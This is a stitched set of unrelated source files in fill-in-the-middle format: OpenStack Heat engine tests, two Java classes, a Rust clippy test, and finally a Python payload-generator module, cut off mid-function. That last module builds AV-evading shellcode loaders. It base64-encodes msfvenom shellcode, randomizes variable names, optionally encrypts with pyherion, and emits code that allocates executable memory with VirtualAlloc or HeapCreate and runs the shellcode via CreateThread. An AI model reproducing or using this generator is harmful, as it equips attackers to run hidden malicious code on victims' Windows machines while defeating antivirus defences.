self.stack.iter_resources = mock.Mock(return_value=resources)
self.eng.list_stack_resources(self.ctx,
self.stack.identifier(),
99)
max_depth = cfg.CONF.max_nested_stack_depth
self.stack.iter_resources.assert_called_once_with(max_depth,
filters=None)
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack')
def test_stack_resources_filter_type(self, mock_load):
mock_load.return_value = self.stack
resources = six.itervalues(self.stack)
self.stack.iter_resources = mock.Mock(return_value=resources)
filters = {'type': 'AWS::EC2::Instance'}
resources = self.eng.list_stack_resources(self.ctx,
self.stack.identifier(),
filters=filters)
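        # the engine consumes the 'type' filter itself, so iter_resources
        # should be invoked with the remaining (empty) filters dict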
self.stack.iter_resources.assert_called_once_with(
0, filters={})
self.assertIn('AWS::EC2::Instance', resources[0]['resource_type'])
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack')
def test_stack_resources_filter_type_not_found(self, mock_load):
mock_load.return_value = self.stack
resources = six.itervalues(self.stack)
self.stack.iter_resources = mock.Mock(return_value=resources)
filters = {'type': 'NonExisted'}
resources = self.eng.list_stack_resources(self.ctx,
self.stack.identifier(),
filters=filters)
self.stack.iter_resources.assert_called_once_with(
0, filters={})
self.assertEqual(0, len(resources))
@mock.patch.object(stack.Stack, 'load')
def test_stack_resources_list_deleted_stack(self, mock_load):
stk = tools.setup_stack('resource_list_deleted_stack', self.ctx)
stack_id = stk.identifier()
mock_load.return_value = stk
tools.clean_up_stack(stk)
resources = self.eng.list_stack_resources(self.ctx, stack_id)
self.assertEqual(1, len(resources))
res = resources[0]
self.assertEqual('DELETE', res['resource_action'])
self.assertEqual('COMPLETE', res['resource_status'])
@mock.patch.object(service.EngineService, '_get_stack')
def test_stack_resources_list_nonexist_stack(self, mock_get):
non_exist_identifier = identifier.HeatIdentifier(
self.ctx.tenant_id, 'wibble',
'18d06e2e-44d3-4bef-9fbf-52480d604b02')
mock_get.side_effect = exception.EntityNotFound(entity='Stack',
name='test')
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.list_stack_resources,
self.ctx, non_exist_identifier)
self.assertEqual(exception.EntityNotFound, ex.exc_info[0])
mock_get.assert_called_once_with(self.ctx, non_exist_identifier,
show_deleted=True)
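    # Helper: builds and stores a stack from policy_template with the
    # keystone client and the engine's stack lookup stubbed out, so the
    # signal tests below can run without real services.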
def _stack_create(self, stack_name):
self.patchobject(keystone.KeystoneClientPlugin, '_create',
return_value=test_fakes.FakeKeystoneClient())
stk = tools.get_stack(stack_name, self.ctx, policy_template)
stk.store()
stk.create()
s = stack_object.Stack.get_by_id(self.ctx, stk.id)
self.patchobject(service.EngineService, '_get_stack', return_value=s)
return stk
def test_signal_reception_async(self):
self.eng.thread_group_mgr = tools.DummyThreadGroupMgrLogStart()
stack_name = 'signal_reception_async'
self.stack = self._stack_create(stack_name)
test_data = {'food': 'yum'}
self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
test_data)
self.assertEqual([(self.stack.id, mock.ANY)],
self.eng.thread_group_mgr.started)
@mock.patch.object(res.Resource, 'signal')
def test_signal_reception_sync(self, mock_signal):
mock_signal.return_value = None
stack_name = 'signal_reception_sync'
self.stack = self._stack_create(stack_name)
test_data = {'food': 'yum'}
self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
test_data,
sync_call=True)
mock_signal.assert_called_once_with(mock.ANY, False)
def test_signal_reception_no_resource(self):
stack_name = 'signal_reception_no_resource'
self.stack = self._stack_create(stack_name)
test_data = {'food': 'yum'}
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_signal, self.ctx,
dict(self.stack.identifier()),
'resource_does_not_exist',
test_data)
self.assertEqual(exception.ResourceNotFound, ex.exc_info[0])
@mock.patch.object(stack.Stack, 'load')
@mock.patch.object(service.EngineService, '_get_stack')
def test_signal_reception_unavailable_resource(self, mock_get, mock_load):
stack_name = 'signal_reception_unavailable_resource'
stk = tools.get_stack(stack_name, self.ctx, policy_template)
stk.store()
self.stack = stk
s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
mock_load.return_value = stk
mock_get.return_value = s
test_data = {'food': 'yum'}
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_signal, self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
test_data)
self.assertEqual(exception.ResourceNotAvailable, ex.exc_info[0])
mock_load.assert_called_once_with(self.ctx, stack=mock.ANY,
use_stored_context=mock.ANY)
mock_get.assert_called_once_with(self.ctx, self.stack.identifier())
@mock.patch.object(res.Resource, 'signal')
def test_signal_returns_metadata(self, mock_signal):
mock_signal.return_value = None
self.stack = self._stack_create('signal_reception')
rsrc = self.stack['WebServerScaleDownPolicy']
test_metadata = {'food': 'yum'}
rsrc.metadata_set(test_metadata)
md = self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy', None,
sync_call=True)
self.assertEqual(test_metadata, md)
mock_signal.assert_called_once_with(mock.ANY, False)
def test_signal_unset_invalid_hook(self):
self.stack = self._stack_create('signal_unset_invalid_hook')
details = {'unset_hook': 'invalid_hook'}
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_signal,
self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
details)
msg = 'Invalid hook type "invalid_hook"'
self.assertIn(msg, six.text_type(ex.exc_info[1]))
self.assertEqual(exception.InvalidBreakPointHook,
ex.exc_info[0])
def test_signal_unset_not_defined_hook(self):
self.stack = self._stack_create('signal_unset_not_defined_hook')
details = {'unset_hook': 'pre-update'}
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_signal,
self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
details)
msg = ('The "pre-update" hook is not defined on '
'AWSScalingPolicy "WebServerScaleDownPolicy"')
self.assertIn(msg, six.text_type(ex.exc_info[1]))
self.assertEqual(exception.InvalidBreakPointHook,
ex.exc_info[0])<|fim▁hole|> def test_signal_calls_metadata_update(self, mock_get, mock_signal,
mock_update):
# fake keystone client
self.patchobject(keystone.KeystoneClientPlugin, '_create',
return_value=test_fakes.FakeKeystoneClient())
stk = tools.get_stack('signal_reception', self.ctx, policy_template)
self.stack = stk
stk.store()
stk.create()
s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
mock_get.return_value = s
mock_signal.return_value = True
        # metadata_update is expected to be called once for the signaled
        # resource
mock_update.return_value = None
self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy', None,
sync_call=True)
mock_get.assert_called_once_with(self.ctx, self.stack.identifier())
mock_signal.assert_called_once_with(mock.ANY, False)
mock_update.assert_called_once_with()
@mock.patch.object(res.Resource, 'metadata_update')
@mock.patch.object(res.Resource, 'signal')
@mock.patch.object(service.EngineService, '_get_stack')
def test_signal_no_calls_metadata_update(self, mock_get, mock_signal,
mock_update):
# fake keystone client
self.patchobject(keystone.KeystoneClientPlugin, '_create',
return_value=test_fakes.FakeKeystoneClient())
stk = tools.get_stack('signal_reception', self.ctx, policy_template)
self.stack = stk
stk.store()
stk.create()
s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
mock_get.return_value = s
mock_signal.return_value = False
self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy', None,
sync_call=True)
mock_get.assert_called_once_with(self.ctx, self.stack.identifier())
mock_signal.assert_called_once_with(mock.ANY, False)
# this will never be called
self.assertEqual(0, mock_update.call_count)
def test_lazy_load_resources(self):
stack_name = 'lazy_load_test'
lazy_load_template = {
'HeatTemplateFormatVersion': '2012-12-12',
'Resources': {
'foo': {'Type': 'GenericResourceType'},
'bar': {
'Type': 'ResourceWithPropsType',
'Properties': {
'Foo': {'Ref': 'foo'},
}
}
}
}
templ = templatem.Template(lazy_load_template)
stk = stack.Stack(self.ctx, stack_name, templ)
self.assertIsNone(stk._resources)
self.assertIsNone(stk._dependencies)
resources = stk.resources
self.assertIsInstance(resources, dict)
self.assertEqual(2, len(resources))
self.assertIsInstance(resources.get('foo'),
generic_rsrc.GenericResource)
self.assertIsInstance(resources.get('bar'),
generic_rsrc.ResourceWithProps)
stack_dependencies = stk.dependencies
self.assertIsInstance(stack_dependencies, dependencies.Dependencies)
self.assertEqual(2, len(stack_dependencies.graph()))
@tools.stack_context('service_mark_healthy_create_complete_test_stk')
def test_mark_healthy_in_create_complete(self):
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', False,
resource_status_reason='noop')
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertIn('resource_action', r)
self.assertIn('resource_status', r)
self.assertIn('resource_status_reason', r)
self.assertEqual(r['resource_action'], 'CREATE')
self.assertEqual(r['resource_status'], 'COMPLETE')
self.assertEqual(r['resource_status_reason'], 'state changed')
@tools.stack_context('service_mark_unhealthy_create_complete_test_stk')
def test_mark_unhealthy_in_create_complete(self):
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason='Some Reason')
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'FAILED')
self.assertEqual(r['resource_status_reason'], 'Some Reason')
@tools.stack_context('service_mark_healthy_check_failed_test_stk')
def test_mark_healthy_check_failed(self):
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason='Some Reason')
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'FAILED')
self.assertEqual(r['resource_status_reason'], 'Some Reason')
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', False,
resource_status_reason='Good Reason')
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'COMPLETE')
self.assertEqual(r['resource_status_reason'], 'Good Reason')
@tools.stack_context('service_mark_unhealthy_check_failed_test_stack')
def test_mark_unhealthy_check_failed(self):
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason='Some Reason')
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'FAILED')
self.assertEqual(r['resource_status_reason'], 'Some Reason')
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason='New Reason')
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'FAILED')
self.assertEqual(r['resource_status_reason'], 'New Reason')
@tools.stack_context('service_mark_unhealthy_invalid_value_test_stk')
def test_mark_unhealthy_invalid_value(self):
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_mark_unhealthy,
self.ctx,
self.stack.identifier(),
'WebServer', "This is wrong",
resource_status_reason="Some Reason")
self.assertEqual(exception.Invalid, ex.exc_info[0])
@tools.stack_context('service_mark_unhealthy_none_reason_test_stk')
def test_mark_unhealthy_none_reason(self):
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True)
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'FAILED')
self.assertEqual(r['resource_status_reason'],
'state changed by resource_mark_unhealthy api')
@tools.stack_context('service_mark_unhealthy_empty_reason_test_stk')
def test_mark_unhealthy_empty_reason(self):
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason="")
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'FAILED')
self.assertEqual(r['resource_status_reason'],
'state changed by resource_mark_unhealthy api')
@tools.stack_context('service_mark_unhealthy_lock_no_converge_test_stk')
def test_mark_unhealthy_lock_no_convergence(self):
mock_acquire = self.patchobject(stack_lock.StackLock,
'acquire',
return_value=None)
mock_release = self.patchobject(stack_lock.StackLock,
'release',
return_value=None)
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason="")
mock_acquire.assert_called_once_with()
mock_release.assert_called_once_with()
@tools.stack_context('service_mark_unhealthy_lock_converge_test_stk',
convergence=True)
def test_mark_unhealthy_stack_lock_convergence(self):
mock_acquire = self.patchobject(res.Resource,
'_acquire',
return_value=None)
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason="")
mock_acquire.assert_called_once_with(self.eng.engine_id)
@tools.stack_context('service_mark_unhealthy_lockexc_converge_test_stk',
convergence=True)
def test_mark_unhealthy_stack_lock_exc_convergence(self):
        # patch Resource._acquire to raise, simulating a concurrent update
        # already holding the resource lock
self.patchobject(
res.Resource,
'_acquire',
return_value=None,
side_effect=exception.UpdateInProgress(self.stack.name))
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_mark_unhealthy,
self.ctx,
self.stack.identifier(),
'WebServer', True,
resource_status_reason="")
self.assertEqual(exception.ActionInProgress, ex.exc_info[0])
@tools.stack_context('service_mark_unhealthy_lockexc_no_converge_test_stk')
def test_mark_unhealthy_stack_lock_exc_no_convergence(self):
self.patchobject(
stack_lock.StackLock,
'acquire',
return_value=None,
side_effect=exception.ActionInProgress(
stack_name=self.stack.name,
action=self.stack.action))
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_mark_unhealthy,
self.ctx,
self.stack.identifier(),
'WebServer', True,
resource_status_reason="")
self.assertEqual(exception.ActionInProgress, ex.exc_info[0])<|fim▁end|>
|
@mock.patch.object(res.Resource, 'metadata_update')
@mock.patch.object(res.Resource, 'signal')
@mock.patch.object(service.EngineService, '_get_stack')
|
<|file_name|>AddInformationsAboutModules.java<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 2016 robert
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package pl.rcebula.code_generation.final_steps;
import java.util.ArrayList;
import java.util.List;
import pl.rcebula.code_generation.intermediate.intermediate_code_structure.IField;
import pl.rcebula.code_generation.intermediate.intermediate_code_structure.IntermediateCode;
import pl.rcebula.code_generation.intermediate.intermediate_code_structure.Line;
import pl.rcebula.code_generation.intermediate.intermediate_code_structure.StringField;
/**
*
* @author robert
*/
public class AddInformationsAboutModules
{
private final IntermediateCode ic;
private final List<String> modulesName;
public AddInformationsAboutModules(IntermediateCode ic, List<String> modulesName)
{
this.ic = ic;
this.modulesName = modulesName;
analyse();
}
private void analyse()
{
        // create the fields
List<IField> fields = new ArrayList<>();
<|fim▁hole|> }
        // insert an empty line at the beginning
ic.insertLine(Line.generateEmptyStringLine(), 0);
        // create the line and insert it at the beginning
Line line = new Line(fields);
ic.insertLine(line, 0);
}
}<|fim▁end|>
|
for (String m : modulesName)
{
IField f = new StringField(m);
fields.add(f);
|
<|file_name|>ParsedTagInfo.java<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 2010 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.doclava;
import java.util.ArrayList;
public class ParsedTagInfo extends TagInfo {
private ContainerInfo mContainer;
private String mCommentText;
private Comment mComment;
ParsedTagInfo(String name, String kind, String text, ContainerInfo base, SourcePositionInfo sp) {
super(name, kind, text, SourcePositionInfo.findBeginning(sp, text));
mContainer = base;
mCommentText = text;
}
public TagInfo[] commentTags() {
if (mComment == null) {
mComment = new Comment(mCommentText, mContainer, position());
}
return mComment.tags();
}
protected void setCommentText(String comment) {
mCommentText = comment;
}
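  /**
   * Flattens the comment tags of the given parsed tags into a single
   * array, concatenating each element's commentTags() in order.
   */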
public static <T extends ParsedTagInfo> TagInfo[] joinTags(T[] tags) {
ArrayList<TagInfo> list = new ArrayList<TagInfo>();
final int N = tags.length;
for (int i = 0; i < N; i++) {
TagInfo[] t = tags[i].commentTags();
final int M = t.length;
for (int j = 0; j < M; j++) {<|fim▁hole|> return list.toArray(new TagInfo[list.size()]);
}
}<|fim▁end|>
|
list.add(t[j]);
}
}
|
<|file_name|>needless_return.rs<|end_file_name|><|fim▁begin|>// run-rustfix
#![feature(let_else)]
#![allow(unused)]
#![allow(
clippy::if_same_then_else,
clippy::single_match,
clippy::needless_bool,
clippy::equatable_if_let
)]
#![warn(clippy::needless_return)]
macro_rules! the_answer {
() => {
42
};
}
fn test_end_of_fn() -> bool {
if true {
// no error!
return true;
}
return true;
}
fn test_no_semicolon() -> bool {
return true;
}
fn test_if_block() -> bool {
if true {
return true;
} else {
return false;
}
}
fn test_match(x: bool) -> bool {
match x {
true => return false,
false => {
return true;
},
}
}
fn test_closure() {
let _ = || {
return true;
};
let _ = || return true;
}
fn test_macro_call() -> i32 {
return the_answer!();
}
fn test_void_fun() {
return;
}
fn test_void_if_fun(b: bool) {
if b {
return;
} else {
return;
}
}
fn test_void_match(x: u32) {
match x {
0 => (),
_ => return,
}
}
fn read_line() -> String {
use std::io::BufRead;
let stdin = ::std::io::stdin();
return stdin.lock().lines().next().unwrap().unwrap();
}
fn borrows_but_not_last(value: bool) -> String {
if value {
use std::io::BufRead;
let stdin = ::std::io::stdin();
let _a = stdin.lock().lines().next().unwrap().unwrap();
return String::from("test");
} else {
return String::new();
}
}
macro_rules! needed_return {
($e:expr) => {
if $e > 3 {
return;
}
};
}
fn test_return_in_macro() {
// This will return and the macro below won't be executed. Removing the `return` from the macro
// will change semantics.
needed_return!(10);
needed_return!(0);
}
mod issue6501 {
fn foo(bar: Result<(), ()>) {
bar.unwrap_or_else(|_| return)
}
fn test_closure() {
let _ = || {
return;
};
let _ = || return;
}
struct Foo;
#[allow(clippy::unnecessary_lazy_evaluations)]
fn bar(res: Result<Foo, u8>) -> Foo {
res.unwrap_or_else(|_| return Foo)
}
}
async fn async_test_end_of_fn() -> bool {
if true {
// no error!
return true;
}
return true;
}
async fn async_test_no_semicolon() -> bool {
return true;
}
async fn async_test_if_block() -> bool {
if true {
return true;
} else {
return false;
}
}
async fn async_test_match(x: bool) -> bool {
match x {
true => return false,
false => {
return true;
},
}
}
async fn async_test_closure() {
let _ = || {
return true;
};
let _ = || return true;
}
async fn async_test_macro_call() -> i32 {
return the_answer!();
}
async fn async_test_void_fun() {
return;
}
async fn async_test_void_if_fun(b: bool) {
if b {
return;
} else {
return;
}
}
async fn async_test_void_match(x: u32) {
match x {
0 => (),
_ => return,
}
}
<|fim▁hole|> use std::io::BufRead;
let stdin = ::std::io::stdin();
return stdin.lock().lines().next().unwrap().unwrap();
}
async fn async_borrows_but_not_last(value: bool) -> String {
if value {
use std::io::BufRead;
let stdin = ::std::io::stdin();
let _a = stdin.lock().lines().next().unwrap().unwrap();
return String::from("test");
} else {
return String::new();
}
}
async fn async_test_return_in_macro() {
needed_return!(10);
needed_return!(0);
}
fn let_else() {
let Some(1) = Some(1) else { return };
}
fn main() {}<|fim▁end|>
|
async fn async_read_line() -> String {
|
<|file_name|>base64_substitution.py<|end_file_name|><|fim▁begin|>"""
This payload receives the msfvenom shellcode, base64 encodes it, and stores it within the payload.
At runtime, the executable decodes the shellcode and executes it in memory.
module by @christruncer
"""
import base64
from datetime import date
from datetime import timedelta
from modules.common import shellcode<|fim▁hole|>
class Payload:
def __init__(self):
# required options
self.description = "Base64 encoded shellcode is decoded at runtime and executed in memory"
self.language = "python"
self.extension = "py"
self.rating = "Excellent"
self.shellcode = shellcode.Shellcode()
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"],
"INJECT_METHOD" : ["Virtual", "Virtual, Void, Heap"],
"EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
}
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
